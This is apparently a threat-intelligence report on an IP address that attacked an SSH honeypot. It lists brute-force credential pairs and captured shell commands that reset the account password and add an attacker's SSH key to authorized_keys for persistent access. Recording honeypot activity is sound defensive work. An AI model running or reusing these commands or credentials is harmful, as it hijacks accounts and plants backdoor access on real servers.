Active Threat โ€ข HIGH

144.91.106.218

First Detection2/19/2026
Last Activity2/20/2026
ISPContabo GmbH
๐ŸŽฏ
5847
Total Attacks
๐Ÿ”Œ
1
Ports
๐Ÿ“ก
1
Attack Types
๐Ÿฆ 
6
Malware

Geolocation

Country
๐Ÿ‡ซ๐Ÿ‡ท France
City
Lauterbourg
ASN
AS51167
ISP
Contabo GmbH

Attack Types

cowrie

Attacked Ports

22

Associated Malware

Attempted Credentials

๐Ÿ”marianne/marianne
2x
๐Ÿ”debian/debian123
2x
๐Ÿ”root/1234Qwer
2x
๐Ÿ”silvia/silvia
2x
๐Ÿ”evgeniy/evgeniy
2x
๐Ÿ”brian/brian
2x
๐Ÿ”tomcat/tomcat
2x
๐Ÿ”francisca/francisca
2x
๐Ÿ”mcuser/mcuser
2x
๐Ÿ”alain/alain
2x
๐Ÿ”lyudmyla/lyudmyla
2x
๐Ÿ”wyatt/wyatt
2x
๐Ÿ”elsa/elsa
2x
๐Ÿ”cs2server/cs2server123
2x
๐Ÿ”root/ZAQ!2wsx
2x

Executed Commands

$if [ [ ! -d ${HOME}/.ssh ] ]5x
$then5x
$nproc5x
$uname -m4x
$fi2x
$arch_info=$(uname -m); cpu_count=$(nproc); echo -e "2LobOQUa\n2LobOQUa" | passwd > /dev/null 2>&1; if [[ ! -d "${HOME}/.ssh" ]]; then; mkdir -p "${HOME}/.ssh" >/dev/null 2>&1; fi; touch "${HOME}/.ssh/authorized_keys" 2>/dev/null; echo -e "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEAk5YcGjNbxRvJI6KfQNawBc4zXb5Hsbr0qflelvsdtu1MNvQ7M+ladgopaPp/trX4mBgSjqATZ9nNYqn/MEoc80k7eFBh+bRSpoNiR+yip5IeIs9mVHoIpDIP6YexqwQCffCXRIUPk1x
$arch_info=$(uname -m); cpu_count=$(nproc); echo -e "carolina\nfFwoId7V\nfFwoId7V" | passwd > /dev/null 2>&1; if [[ ! -d "${HOME}/.ssh" ]]; then; mkdir -p "${HOME}/.ssh" >/dev/null 2>&1; fi; touch "${HOME}/.ssh/authorized_keys" 2>/dev/null; echo -e "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEAk5YcGjNbxRvJI6KfQNawBc4zXb5Hsbr0qflelvsdtu1MNvQ7M+ladgopaPp/trX4mBgSjqATZ9nNYqn/MEoc80k7eFBh+bRSpoNiR+yip5IeIs9mVHoIpDIP6YexqwQ1x
$arch_info=$(uname -m); cpu_count=$(nproc); echo -e "lyudmyla\n4fMZ6CCp\n4fMZ6CCp" | passwd > /dev/null 2>&1; if [[ ! -d "${HOME}/.ssh" ]]; then; mkdir -p "${HOME}/.ssh" >/dev/null 2>&1; fi; touch "${HOME}/.ssh/authorized_keys" 2>/dev/null; echo -e "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEAk5YcGjNbxRvJI6KfQNawBc4zXb5Hsbr0qflelvsdtu1MNvQ7M+ladgopaPp/trX4mBgSjqATZ9nNYqn/MEoc80k7eFBh+bRSpoNiR+yip5IeIs9mVHoIpDIP6YexqwQ1x
$arch_info=$(uname -m); cpu_count=$(nproc); echo -e "tifVcLRE\ntifVcLRE" | passwd > /dev/null 2>&1; if [[ ! -d "${HOME}/.ssh" ]]; then; mkdir -p "${HOME}/.ssh" >/dev/null 2>&1; fi; touch "${HOME}/.ssh/authorized_keys" 2>/dev/null; echo -e "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEAk5YcGjNbxRvJI6KfQNawBc4zXb5Hsbr0qflelvsdtu1MNvQ7M+ladgopaPp/trX4mBgSjqATZ9nNYqn/MEoc80k7eFBh+bRSpoNiR+yip5IeIs9mVHoIpDIP6YexqwQCffCXRIUPk1x

Risk Assessment

60
/100
LowMediumHighCritical